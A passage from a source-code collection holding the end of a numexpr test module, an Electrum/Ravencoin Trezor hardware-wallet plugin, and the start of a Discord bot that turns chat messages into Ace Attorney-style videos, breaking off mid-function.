res2 = evaluate("(a == b'pepe') & (b == b'')")
assert_array_equal(res2, np.array([False, True]))
def test_empty_string2(self):
a = np.array([b"p", b"pepe"])
b = np.array([b"pepe2", b""])
res = evaluate("(a == b'') & (b == b'pepe2')")
assert_array_equal(res, np.array([False, False]))
res2 = evaluate("(a == b'pepe') & (b == b'')")
assert_array_equal(res, np.array([False, False]))
def test_add_numeric_array(self):
sarr = self.str_array1
narr = arange(len(sarr), dtype='int32')
expr = 'sarr >= narr'
self.assert_missing_op('ge_bsi', expr, locals())
def assert_missing_op(self, op, expr, local_dict):
msg = "expected NotImplementedError regarding '%s'" % op
try:
evaluate(expr, local_dict)
except NotImplementedError as nie:
if "'%s'" % op not in nie.args[0]:
self.fail(msg)
else:
self.fail(msg)
def test_compare_prefix(self):
# Check comparing two strings where one is a prefix of the
# other.
for s1, s2 in [(b'foo', b'foobar'), (b'foo', b'foo\0bar'),
(b'foo\0a', b'foo\0bar')]:
self.assertTrue(evaluate('s1 < s2'))
self.assertTrue(evaluate('s1 <= s2'))
self.assertTrue(evaluate('~(s1 == s2)'))
self.assertTrue(evaluate('~(s1 >= s2)'))
self.assertTrue(evaluate('~(s1 > s2)'))
# Check for NumPy array-style semantics in string equality.
s1, s2 = b'foo', b'foo\0\0'
self.assertTrue(evaluate('s1 == s2'))
# Case for testing selections in fields which are aligned but whose
# data length is not an exact multiple of the length of the record.
# The following test exposes the problem only in 32-bit machines,
# because in 64-bit machines 'c2' is unaligned. However, this should
# check most platforms where, while not unaligned, 'len(datatype) >
# boundary_alignment' is fullfilled.
class test_irregular_stride(TestCase):
def test_select(self):
f0 = arange(10, dtype=int32)
f1 = arange(10, dtype=float64)
irregular = rec.fromarrays([f0, f1])
f0 = irregular['f0']
f1 = irregular['f1']
i0 = evaluate('f0 < 5')
i1 = evaluate('f1 < 5')
assert_array_equal(f0[i0], arange(5, dtype=int32))
assert_array_equal(f1[i1], arange(5, dtype=float64))
# Cases for testing arrays with dimensions that can be zero.
class test_zerodim(TestCase):
def test_zerodim1d(self):
a0 = array([], dtype=int32)
a1 = array([], dtype=float64)
r0 = evaluate('a0 + a1')
r1 = evaluate('a0 * a1')
assert_array_equal(r0, a1)
assert_array_equal(r1, a1)
def test_zerodim3d(self):
a0 = array([], dtype=int32).reshape(0, 2, 4)
a1 = array([], dtype=float64).reshape(0, 2, 4)
r0 = evaluate('a0 + a1')
r1 = evaluate('a0 * a1')
assert_array_equal(r0, a1)
assert_array_equal(r1, a1)
@contextmanager
def _environment(key, value):
old = os.environ.get(key)
os.environ[key] = value
try:
yield
finally:
if old:
os.environ[key] = old
else:
del os.environ[key]
# Test cases for the threading configuration
class test_threading_config(TestCase):
def test_max_threads_unset(self):
# Has to be done in a subprocess as `importlib.reload` doesn't let us
# re-initialize the threadpool
script = '\n'.join([
"import os",
"if 'NUMEXPR_MAX_THREADS' in os.environ: os.environ.pop('NUMEXPR_MAX_THREADS')",
"if 'OMP_NUM_THREADS' in os.environ: os.environ.pop('OMP_NUM_THREADS')",
"import numexpr",
"assert(numexpr.nthreads <= 8)",
"exit(0)"])
subprocess.check_call([sys.executable, '-c', script])
def test_max_threads_set(self):
# Has to be done in a subprocess as `importlib.reload` doesn't let us
# re-initialize the threadpool
script = '\n'.join([
"import os",
"os.environ['NUMEXPR_MAX_THREADS'] = '4'",
"import numexpr",
"assert(numexpr.MAX_THREADS == 4)",
"exit(0)"])
subprocess.check_call([sys.executable, '-c', script])
def test_numexpr_num_threads(self):
with _environment('OMP_NUM_THREADS', '5'):
# NUMEXPR_NUM_THREADS has priority
with _environment('NUMEXPR_NUM_THREADS', '3'):
if 'sparc' in platform.machine():
self.assertEqual(1, numexpr._init_num_threads())
else:
self.assertEqual(3, numexpr._init_num_threads())
def test_omp_num_threads(self):
with _environment('OMP_NUM_THREADS', '5'):
if 'sparc' in platform.machine():
self.assertEqual(1, numexpr._init_num_threads())
else:
self.assertEqual(5, numexpr._init_num_threads())
def test_vml_threads_round_trip(self):
n_threads = 3
if use_vml:
numexpr.utils.set_vml_num_threads(n_threads)
set_threads = numexpr.utils.get_vml_num_threads()
self.assertEqual(n_threads, set_threads)
else:
self.assertIsNone(numexpr.utils.set_vml_num_threads(n_threads))
self.assertIsNone(numexpr.utils.get_vml_num_threads())
# Case test for threads
class test_threading(TestCase):
def test_thread(self):
import threading
class ThreadTest(threading.Thread):
def run(self):
a = arange(3)
assert_array_equal(evaluate('a**3'), array([0, 1, 8]))
test = ThreadTest()
test.start()
test.join()
def test_multithread(self):
import threading
# Running evaluate() from multiple threads shouldn't crash
def work(n):
a = arange(n)
evaluate('a+a')
work(10) # warm compilation cache
nthreads = 30
threads = [threading.Thread(target=work, args=(1e5,))
for i in range(nthreads)]
for t in threads:
t.start()
for t in threads:
t.join()
# The worker function for the subprocess (needs to be here because Windows
# has problems pickling nested functions with the multiprocess module :-/)
def _worker(qout=None):
ra = np.arange(1e3)
rows = evaluate('ra > 0')
#print "Succeeded in evaluation!\n"
if qout is not None:
qout.put("Done")
# Case test for subprocesses (via multiprocessing module)
class test_subprocess(TestCase):
def test_multiprocess(self):
try:
import multiprocessing as mp
except ImportError:
return
# Check for two threads at least
numexpr.set_num_threads(2)
#print "**** Running from main process:"
_worker()
#print "**** Running from subprocess:"
qout = mp.Queue()
ps = mp.Process(target=_worker, args=(qout,))
ps.daemon = True
ps.start()
result = qout.get()
#print result
def print_versions():
"""Print the versions of software that numexpr relies on."""
# from pkg_resources import parse_version
from numexpr.cpuinfo import cpu
import platform
np_version = LooseVersion(np.__version__)
if np_version < minimum_numpy_version:
print('*Warning*: NumPy version is lower than recommended: %s < %s' % (np_version, minimum_numpy_version))
print('-=' * 38)
print('Numexpr version: %s' % numexpr.__version__)
print('NumPy version: %s' % np.__version__)
print('Python version: %s' % sys.version)
(sysname, nodename, release, os_version, machine, processor) = platform.uname()
print('Platform: %s-%s-%s' % (sys.platform, machine, os_version))
try:
# cpuinfo doesn't work on OSX well it seems, so protect these outputs
# with a try block
cpu_info = cpu.info[0]
print('CPU vendor: %s' % cpu_info.get('VendorIdentifier', ''))
print('CPU model: %s' % cpu_info.get('ProcessorNameString', ''))
print('CPU clock speed: %s MHz' % cpu_info.get('~MHz',''))
except KeyError:
pass
print('VML available? %s' % use_vml)
if use_vml:
print('VML/MKL version: %s' % numexpr.get_vml_version())
print('Number of threads used by default: %d '
'(out of %d detected cores)' % (numexpr.nthreads, numexpr.ncores))
print('Maximum number of threads: %s' % numexpr.MAX_THREADS)
print('-=' * 38)
def test(verbosity=1):
"""
Run all the tests in the test suite.
"""
print_versions()
# For some reason, NumPy issues all kinds of warnings when using Python3.
# Ignoring them in tests should be ok, as all results are checked out.
# See https://github.com/pydata/numexpr/issues/183 for details.
np.seterr(divide='ignore', invalid='ignore', over='ignore', under='ignore')
return unittest.TextTestRunner(verbosity=verbosity).run(suite())
test.__test__ = False
def suite():
import unittest
import platform as pl
theSuite = unittest.TestSuite()
niter = 1
class TestExpressions(TestCase):
pass
def add_method(func):
def method(self):
return func()
setattr(TestExpressions, func.__name__,
method.__get__(None, TestExpressions))
for func in test_expressions():
add_method(func)
for n in range(niter):
theSuite.addTest(unittest.makeSuite(test_numexpr))
if 'sparc' not in platform.machine():
theSuite.addTest(unittest.makeSuite(test_numexpr2))
theSuite.addTest(unittest.makeSuite(test_evaluate))
theSuite.addTest(unittest.makeSuite(TestExpressions))
theSuite.addTest(unittest.makeSuite(test_int32_int64))
theSuite.addTest(unittest.makeSuite(test_uint32_int64))
theSuite.addTest(unittest.makeSuite(test_strings))
theSuite.addTest(
unittest.makeSuite(test_irregular_stride))
theSuite.addTest(unittest.makeSuite(test_zerodim))
theSuite.addTest(unittest.makeSuite(test_threading_config))
# multiprocessing module is not supported on Hurd/kFreeBSD
if (pl.system().lower() not in ('gnu', 'gnu/kfreebsd')):
theSuite.addTest(unittest.makeSuite(test_subprocess))
# I need to put this test after test_subprocess because
# if not, the test suite locks immediately before test_subproces.
# This only happens with Windows, so I suspect of a subtle bad
# interaction with threads and subprocess :-/
theSuite.addTest(unittest.makeSuite(test_threading))
return theSuite
if __name__ == '__main__':
print_versions()
unittest.main(defaultTest='suite')
# suite = suite()
# unittest.TextTestRunner(verbosity=2).run(suite)
|
trezor.py
|
import traceback
import sys
from typing import NamedTuple, Any
from electrum.util import bfh, bh2u, versiontuple, UserCancelled, UserFacingException
from electrum.ravencoin import TYPE_ADDRESS, TYPE_SCRIPT
from electrum.bip32 import BIP32Node, convert_bip32_path_to_list_of_uint32 as parse_path
from electrum import constants
from electrum.i18n import _
from electrum.plugin import Device
from electrum.transaction import deserialize, Transaction
from electrum.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from electrum.base_wizard import ScriptTypeNotSupported, HWD_SETUP_NEW_WALLET
from electrum.logging import get_logger
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import (is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data,
LibraryFoundButUnusable, OutdatedHwFirmwareException)
_logger = get_logger(__name__)
try:
import trezorlib
import trezorlib.transport
from trezorlib.transport.bridge import BridgeTransport, call_bridge
from .clientbase import TrezorClientBase
from trezorlib.messages import (
RecoveryDeviceType, HDNodeType, HDNodePathType,
InputScriptType, OutputScriptType, MultisigRedeemScriptType,
TxInputType, TxOutputType, TxOutputBinType, TransactionType, SignTx)
RECOVERY_TYPE_SCRAMBLED_WORDS = RecoveryDeviceType.ScrambledWords
RECOVERY_TYPE_MATRIX = RecoveryDeviceType.Matrix
TREZORLIB = True
except Exception as e:
_logger.exception('error importing trezorlib')
TREZORLIB = False
RECOVERY_TYPE_SCRAMBLED_WORDS, RECOVERY_TYPE_MATRIX = range(2)
# Trezor initialization methods
TIM_NEW, TIM_RECOVER = range(2)
TREZOR_PRODUCT_KEY = 'Trezor'
class TrezorKeyStore(Hardware_KeyStore):
hw_type = 'trezor'
device = TREZOR_PRODUCT_KEY
def get_derivation(self):
return self.derivation
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
msg_sig = client.sign_message(address_path, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
if txin.get('prev_tx') is None and not Transaction.is_segwit_input(txin):
raise UserFacingException(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class TrezorInitSettings(NamedTuple):
word_count: int
label: str
pin_enabled: bool
passphrase_enabled: bool
recovery_type: Any = None
no_backup: bool = False
class TrezorPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, types
firmware_URL = 'https://wallet.trezor.io'
libraries_URL = 'https://github.com/trezor/python-trezor'
minimum_firmware = (1, 6, 0)
keystore_class = TrezorKeyStore
minimum_library = (0, 11, 0)
maximum_library = (0, 13)
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
DEVICE_IDS = (TREZOR_PRODUCT_KEY,)
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
super().__init__(parent, config, name)
self.libraries_available = self.check_libraries_available()
if not self.libraries_available:
return
self.device_manager().register_enumerate_func(self.enumerate)
def get_library_version(self):
import trezorlib
try:
version = trezorlib.__version__
except Exception:
version = 'unknown'
if TREZORLIB:
return version
else:
raise LibraryFoundButUnusable(library_version=version)
def enumerate(self):
# If there is a bridge, prefer that.
# On Windows, the bridge runs as Admin (and Electrum usually does not),
# so the bridge has better chances of finding devices. see #5420
# This also avoids duplicate entries.
try:
call_bridge("enumerate")
except Exception:
devices = trezorlib.transport.enumerate_devices()
else:
devices = BridgeTransport.enumerate()
return [Device(path=d.get_path(),
interface_number=-1,
id_=d.get_path(),
product_key=TREZOR_PRODUCT_KEY,
usage_page=0,
transport_ui_string=d.get_path())
for d in devices]
def create_client(self, device, handler):
try:
self.logger.info(f"connecting to device at {device.path}")
transport = trezorlib.transport.get_transport(device.path)
except BaseException as e:
self.logger.info(f"cannot connect at {device.path} {e}")
return None
if not transport:
self.logger.info(f"cannot connect at {device.path}")
return
self.logger.info(f"connected to device at {device.path}")
# note that this call can still raise!
return TrezorClientBase(transport, handler, self)
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Ravencoin Testnet" if constants.net.TESTNET else "Ravencoin"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, device_id)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
self.logger.exception('')
handler.show_error(str(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings: TrezorInitSettings, method, device_id, wizard, handler):
if method == TIM_RECOVER and settings.recovery_type == RECOVERY_TYPE_SCRAMBLED_WORDS:
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"),
blocking=True)
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if not client:
raise Exception(_("The device was disconnected."))
if method == TIM_NEW:
strength_from_word_count = {12: 128, 18: 192, 24: 256}
client.reset_device(
strength=strength_from_word_count[settings.word_count],
passphrase_protection=settings.passphrase_enabled,
pin_protection=settings.pin_enabled,
label=settings.label,
no_backup=settings.no_backup)
elif method == TIM_RECOVER:
client.recover_device(
recovery_type=settings.recovery_type,
word_count=settings.word_count,
passphrase_protection=settings.passphrase_enabled,
pin_protection=settings.pin_enabled,
label=settings.label)
if settings.recovery_type == RECOVERY_TYPE_MATRIX:
handler.close_matrix_dialog()
else:
raise RuntimeError("Unsupported recovery method")
def _make_node_path(self, xpub, address_n):
bip32node = BIP32Node.from_xkey(xpub)
node = HDNodeType(
depth=bip32node.depth,
fingerprint=int.from_bytes(bip32node.fingerprint, 'big'),
child_num=int.from_bytes(bip32node.child_number, 'big'),
chain_code=bip32node.chaincode,
public_key=bip32node.eckey.get_public_key_bytes(compressed=True),
)
return HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
if client is None:
raise UserFacingException(_('Failed to create a client for this device.') + '\n' +
_('Make sure it is in the correct state.'))
if not client.is_uptodate():
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
raise OutdatedHwFirmwareException(msg)
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
is_creating_wallet = purpose == HWD_SETUP_NEW_WALLET
client.get_xpub('m', 'standard', creating=is_creating_wallet)
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_trezor_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return InputScriptType.SPENDWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return InputScriptType.SPENDP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return InputScriptType.SPENDADDRESS
if electrum_txin_type in ('p2sh', ):
return InputScriptType.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_trezor_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return OutputScriptType.PAYTOWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return OutputScriptType.PAYTOP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return OutputScriptType.PAYTOADDRESS
if electrum_txin_type in ('p2sh', ):
return OutputScriptType.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
prev_tx = { bfh(txhash): self.electrum_tx_to_txtype(tx, xpub_path) for txhash, tx in prev_tx.items() }
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, xpub_path, True)
outputs = self.tx_outputs(keystore.get_derivation(), tx)
details = SignTx(lock_time=tx.locktime, version=tx.version)
signatures, _ = client.sign_tx(self.get_coin_name(), inputs, outputs, details=details, prev_txes=prev_tx)
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
deriv_suffix = wallet.get_address_index(address)
derivation = keystore.derivation
address_path = "%s/%d/%d"%(derivation, *deriv_suffix)
script_type = self.get_trezor_input_script_type(wallet.txin_type)
# prepare multisig, if available:
xpubs = wallet.get_master_public_keys()
if len(xpubs) > 1:
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pairs = sorted(zip(pubkeys, xpubs))
multisig = self._make_multisig(
wallet.m,
[(xpub, deriv_suffix) for _, xpub in sorted_pairs])
else:
multisig = None
client = self.get_client(keystore)
client.show_address(address_path, script_type, multisig)
def tx_inputs(self, tx, xpub_path, for_sig=False):
inputs = []
for txin in tx.inputs():
txinputtype = TxInputType()
if txin['type'] == 'coinbase':
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
xpubs = [parse_xpubkey(x) for x in x_pubkeys]
multisig = self._make_multisig(txin.get('num_sig'), xpubs, txin.get('signatures'))
script_type = self.get_trezor_input_script_type(txin['type'])
txinputtype = TxInputType(
script_type=script_type,
multisig=multisig)
# find which key is mine
for xpub, deriv in xpubs:
if xpub in xpub_path:
xpub_n = parse_path(xpub_path[xpub])
txinputtype.address_n = xpub_n + deriv
break
prev_hash = bfh(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.get('scriptSig') is not None:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def _make_multisig(self, m, xpubs, signatures=None):
if len(xpubs) == 1:
return None
pubkeys = [self._make_node_path(xpub, deriv) for xpub, deriv in xpubs]
if signatures is None:
signatures = [b''] * len(pubkeys)
elif len(signatures) != len(pubkeys):
raise RuntimeError('Mismatched number of signatures')
else:
signatures = [bfh(x)[:-1] if x else b'' for x in signatures]
return MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=signatures,
m=m)
def tx_outputs(self, derivation, tx):
def create_output_by_derivation():
script_type = self.get_trezor_output_script_type(info.script_type)
deriv = parse_path("/%d/%d" % index)
multisig = self._make_multisig(m, [(xpub, deriv) for xpub in xpubs])
txoutputtype = TxOutputType(
multisig=multisig,
amount=amount,
address_n=parse_path(derivation + "/%d/%d" % index),
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = OutputScriptType.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(o)
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = OutputScriptType.PAYTOADDRESS
txoutputtype.address = address
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for o in tx.outputs():
_type, address, amount = o.type, o.address, o.value
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m = info.address_index, info.sorted_xpubs, info.num_sig
on_change_branch = index[0] == 1
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
# note: ^ restriction can be removed once we require fw
# that has https://github.com/trezor/trezor-mcu/pull/306
if on_change_branch == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx, xpub_path):
t = TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
t.inputs = self.tx_inputs(tx, xpub_path)
t.bin_outputs = [
TxOutputBinType(amount=vout['value'], script_pubkey=bfh(vout['scriptPubKey']))
for vout in d['outputs']
]
return t
|
main.py
|
import discord
import os
import random
import requests
import sys
import threading
import time
import yaml
sys.path.append("./objection_engine")
from deletion import Deletion
from discord.ext import commands, tasks
from message import Message
from objection_engine.beans.comment import Comment
from objection_engine.renderer import render_comment_list
from render import Render, State
from typing import List
# Global Variables:
renderQueue = []
deletionQueue = []
intents = discord.Intents.default()
intents.members = True
def loadConfig():
try:
with open("config.yaml") as file:
config = yaml.load(file, Loader=yaml.FullLoader)
global token, prefix, deletionDelay
token = config["token"].strip()
if not token:
raise Exception("The 'token' field is missing in the config file (config.yaml)!")
prefix = config["prefix"].strip()
if not prefix:
raise Exception("The 'prefix' field is missing in the config file (config.yaml)!")
deletionDelay = config["deletionDelay"].strip()
if not deletionDelay:
raise Exception("The 'deletionDelay' field is missing in the config file (config.yaml)!")
return True
except KeyError as keyErrorException:
print(f"The mapping key {keyErrorException} is missing in the config file (config.yaml)!")
except Exception as exception:
print(exception)
return False
if not loadConfig():
exit()
courtBot = commands.AutoShardedBot(command_prefix=prefix, Intents=intents)
# Default 'help' command is removed, we will make our own
courtBot.remove_command("help")
currentActivityText = f"{prefix}help"
async def changeActivity(newActivityText):
try:
global currentActivityText
if currentActivityText == newActivityText:
return
else:
newActivity = discord.Game(newActivityText)
await courtBot.change_presence(activity=newActivity)
currentActivityText = newActivityText
print(f"Activity was changed to {currentActivityText}")
except Exception as exception:
print(f"Error: {exception}")
def addToDeletionQueue(message: discord.Message):
# Only if deletion delay is grater than 0, add it to the deletionQueue.
if int(deletionDelay) > 0:
newDeletion = Deletion(message, int(deletionDelay))
deletionQueue.append(newDeletion)
@courtBot.event
async def on_message(message):
if message.author is courtBot.user or message.author.bot:
return
if message.channel.type is discord.ChannelType.private:
embedResponse = discord.Embed(description="I won't process any messages via PM.\nIf you have any problems, please go to [the support server](https://discord.gg/pcS4MPbRDU).", color=0xff0000)
await message.channel.send(embed=embedResponse)
return
await courtBot.process_commands(message)
@courtBot.command()
async def help(context):
dummyAmount = random.randint(2, 150)
helpEmbed = discord.Embed(description="Discord bot that turns message chains into ace attorney scenes.\nIf you have any problems, please go to [the support server](https://discord.gg/pcS4MPbRDU).", color=0x3366CC, footer="Do not include these symbols (\"<\" and \">\") when using this command")
helpEmbed.set_author(name=courtBot.user.name, icon_url=courtBot.user.avatar_url)
helpEmbed.add_field(name="How to use?", value=f"`{prefix}render <number_of_messages>`", inline=False)
helpEmbed.add_field(name="Example", value=f"Turn the last {dummyAmount} messages into an ace attorney scene: `{prefix}render {dummyAmount}`", inline=False)
helpEmbed.add_field(name="Starting message", value="By default the bot will load the specified number of messages from the last message (before using the command) going backwards, if you want the message count to start from another message, reply to it when using the command.", inline=False)
helpMessage = await context.send(embed=helpEmbed)
addToDeletionQueue(helpMessage)
# This command is only for the bot owner, it will ignore everybody else
@courtBot.command()
@commands.is_owner()
async def queue(context):
filename = "queue.txt"
with open(filename, 'w', encoding="utf-8") as queue:
global renderQueue
renderQueueSize = len(renderQueue)
queue.write(f"There are {renderQueueSize} item(s) in the queue!\n")
for positionInQueue, render in enumerate(iterable=renderQueue):
queue.write(f"\n#{positionInQueue:04}\n")
try: queue.write(f"Requested by: {render.getContext().author.name}#{render.getContext().author.discriminator}\n")
except: pass
try: queue.write(f"Number of messages: {len(render.getMessages())}\n")
except: pass
try: queue.write(f"Guild: {render.getFeedbackMessage().channel.guild.name}\n")
except: pass
try: queue.write(f"Channel: #{render.getFeedbackMessage().channel.name}\n")
except: pass
try: queue.write(f"State: {render.getStateString()}\n")
except: pass
await context.send(file=discord.File(filename))
clean([], filename)
@courtBot.command()
async def render(context, numberOfMessages: int):
global renderQueue
feedbackMessage = await context.send(content="`Fetching messages...`")
try:
if not (numberOfMessages in range(1, 151)):
raise Exception("Number of messages must be between 1 and 150")
# baseMessage is the message from which the specified number of messages will be fetch, not including itself
baseMessage = context.message.reference.resolved if context.message.reference else context.message
courtMessages = []
discordMessages = []
# If the render command was executed within a reply (baseMessage and context.Message aren't the same), we want
# to append the message the user replied to (baseMessage) to the 'discordMessages' list and substract 1 from
# 'numberOfMessages' that way we are taking the added baseMessage into consideration and avoid getting 1 extra message)
if not baseMessage.id == context.message.id:
numberOfMessages = numberOfMessages - 1
discordMessages.append(baseMessage)
# This will append all messages to the already existing discordMessages, if the message was a reply it should already
# include one message (the one it was replying to), if not: it will be empty at this point.
discordMessages += await context.channel.history(limit=numberOfMessages, oldest_first=False, before=baseMessage).flatten()
for discordMessage in discordMessages:
message = Message(discordMessage)
if message.text.strip():
courtMessages.insert(0, message.to_Comment())
if len(courtMessages) < 1:
raise Exception("There should be at least one person in the conversation.")
newRender = Render(State.QUEUED, context, feedbackMessage, courtMessages)
renderQueue.append(newRender)
except Exception as exception:
exceptionEmbed = discord.Embed(description=exception, color=0xff0000)
await feedbackMessage.edit(content="", embed=exceptionEmbed)
addToDeletionQueue(feedbackMessage)
@tasks.loop(seconds=1)
async def deletionQueueLoop():
global deletionQueue
deletionQueueSize = len(deletionQueue)
# Delete message and remove from queue if remaining time is less than (or equal to) 0
if deletionQueueSize > 0:
for index in reversed(range(deletionQueueSize)):
if await deletionQueue[index].update():
deletionQueue.pop(index)
@tasks.loop(seconds=5)
async def renderQueueLoop():
global renderQueue
renderQueueSize = len(renderQueue)
await changeActivity(f"{prefix}help | queue: {renderQueueSize}")
for positionInQueue, render in enumerate(iterable=renderQueue, start=1):
try:
if render.getState() == State.QUEUED:
newFeedback = f"""
`Fetching messages... Done!`
`Position in the queue: #{(positionInQueue)}`
"""
await render.updateFeedback(newFeedback)
if render.getState() == State.INPROGRESS:
newFeedback = f"""
`Fetching messages... Done!`
`Your video is being generated...`
"""
await render.updateFeedback(newFeedback)
if render.getState() == State.FAILED:
newFeedback = f"""
`Fetching messages... Done!`
`Your video is being generated... Failed!`
"""
await render.updateFeedback(newFeedback)
render.setState(State.DONE)
if render.getState() == State.RENDERED:
newFeedback = f"""
`Fetching messages... Done!`
`Your video is being generated... Done!`
`Uploading file to Discord...`
"""
await render.updateFeedback(newFeedback)
render.setState(State.UPLOADING)
# If the file size is lower than the maximun file size allowed in this guild, upload it to Discord
fileSize = os.path.getsize(render.getOutputFilename())
if fileSize < render.getContext().channel.guild.filesize_limit:
await render.getContext().send(content=render.getContext().author.mention, file=discord.File(render.getOutputFilename()))
render.setState(State.DONE)
newFeedback = f"""
`Fetching messages... Done!`
`Your video is being generated... Done!`
`Uploading file to Discord... Done!`
"""
await render.updateFeedback(newFeedback)
else:
try:
newFeedback = f"""
`Fetching messages... Done!`
`Your video is being generated... Done!`
`Video file too big for you server! {round(fileSize/1000000, 2)} MB`
`Trying to upload file to an external server...`
"""
await render.updateFeedback(newFeedback)
with open(render.getOutputFilename(), 'rb') as videoFile:
files = {'files[]': (render.getOutputFilename(), videoFile)}
response = requests.post('https://uguu.se/upload.php?output=text', files=files).content.decode("utf-8").strip()
newFeedback = f"""
`Fetching messages... Done!`
`Your video is being generated... Done!`
`Video file too big for you server! {round(fileSize/1000000, 2)} MB`
`Trying to upload file to an external server... Done!`
"""
await render.updateFeedback(newFeedback)
await render.getContext().send(content=f"{render.getContext().author.mention}\n{response}\n_This video will be deleted in 48 hours_")
render.setState(State.DONE)
except Exception as exception:
newFeedback = f"""
`Fetching messages... Done!`
